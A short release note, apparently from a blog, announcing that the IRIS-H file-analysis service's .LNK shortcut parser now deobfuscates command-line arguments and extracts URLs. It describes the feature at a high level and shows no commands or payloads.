Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API & UI (clear browser cache for 'iris-h.service' to see the changes)
Short Description: Parser for LNK files has been updated. Command line arguments string deobfuscation and URL extraction code have been added. UI Report page has been updated to display the new data.
Outstanding Tasks: None
Detailed Summary
IRIS-H Shell Link (.LNK) file parser has been updated and now attempts to deobfuscate the command line arguments string. When the command line arguments string is present, the service will attempt the following:
- detect environment variables assignments with 'set' command
- detect environment variables usage with ' ! ' and ' % ' special characters
- replace referenced environment variables with their corresponding values
- remove escaping characters ' ^ ' and ' ` '
- detect and extract URL strings
- detect string concatenation operations and perform them
Below is a report example showing the new feature in action.
 |
| LNK file analysis results showing deobfuscated command line arguments string and extracted URL |
Corresponding report - https://iris-h.services/report/7278cb3c9a5b14dcc54de59e21ec8c6c
More examples can be found here:
NOTE
IRIS-H UI changes might require your Internet browser cache clean up for iris-h.services website to take effect.
IRIS-H UI changes might require your Internet browser cache clean up for iris-h.services website to take effect.
No comments:
Post a Comment